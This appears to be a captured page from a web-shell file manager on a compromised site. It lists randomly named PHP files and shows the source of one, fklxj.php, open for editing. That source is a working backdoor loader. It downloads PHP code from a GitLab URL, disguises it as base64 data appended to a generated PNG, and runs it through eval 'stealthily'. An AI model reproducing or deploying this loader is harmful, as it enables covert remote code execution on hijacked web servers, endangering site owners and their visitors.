X7ROOT File Manager
Current Path:
/home/greakqsw/theblogginglab.org/5uq8v7-20260314182546/3myf64/cgi-bin/w1q2cv
home
/
greakqsw
/
theblogginglab.org
/
5uq8v7-20260314182546
/
3myf64
/
cgi-bin
/
w1q2cv
/
ðŸ“
..
📄
8x2gj.php
(4.24 KB)
📄
9gvid.php
(41.11 KB)
📄
about.php
(243 B)
📄
bepyo.php
(52.04 KB)
📄
error_log
(2.42 KB)
📄
fklxj.php
(2.92 KB)
📄
hpmo7.php
(106.33 KB)
📄
index-20260307171220-20260307210447.php
(102 B)
📄
index-20260307171220.php
(102 B)
📄
index.php
(102 B)
📄
iwdxk.php
(83.24 KB)
📄
mjdqk.php
(189.87 KB)
📄
pbyk4.php
(21.94 KB)
📄
stheo.php
(634 B)
Editing: fklxj.php
<?php /* Improved PNG disguise for hidden PHP payloads. This script fetches remote code, embeds it into a realistic PNG file, and executes it stealthily. */ session_start(); // Main remote code URL (can be overridden by session) $mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php'; // -------------------------------------------- // 1. Generate a realistic PNG image (128x128) // -------------------------------------------- function generateRealisticPngHeader($width = 128, $height = 128) { ob_start(); $image = imagecreatetruecolor($width, $height); // Fill with random noise for ($x = 0; $x < $width; $x++) { for ($y = 0; $y < $height; $y++) { $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255)); imagesetpixel($image, $x, $y, $color); } } imagepng($image); imagedestroy($image); return ob_get_clean(); // Binary PNG data } // -------------------------------------------- // 2. Load remote PHP code from given URL // -------------------------------------------- function loadRemoteData($url) { $content = ''; try { $file = new SplFileObject($url); while (!$file->eof()) { $content .= $file->fgets(); } } catch (Throwable $e) { $content = ''; } if (strlen(trim($content)) < 1) { $content = @file_get_contents($url); } if (strlen(trim($content)) < 1 && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $content = curl_exec($ch); curl_close($ch); } return $content; } // -------------------------------------------- // 3. Create payload by appending hidden PHP code // -------------------------------------------- function createStealthPayload($phpCode) { $png = generateRealisticPngHeader(); $marker = '###PAYLOAD###'; $encoded = base64_encode($phpCode); return $png . $marker . $encoded; } // -------------------------------------------- // 4. Extract and execute hidden payload // -------------------------------------------- function extractAndExecutePayload($data) { $marker = '###PAYLOAD###'; $parts = explode($marker, $data); if (count($parts) === 2) { $decoded = base64_decode($parts[1]); if ($decoded !== false && strlen(trim($decoded)) > 0) { @eval("?>$decoded"); } } } // -------------------------------------------- // Main Execution Flow // -------------------------------------------- $remoteCode = loadRemoteData($mainUrl); if (strlen(trim($remoteCode)) > 0) { $payload = createStealthPayload($remoteCode); extractAndExecutePayload($payload); // Executes hidden remote code } ?>
Upload File
Create Folder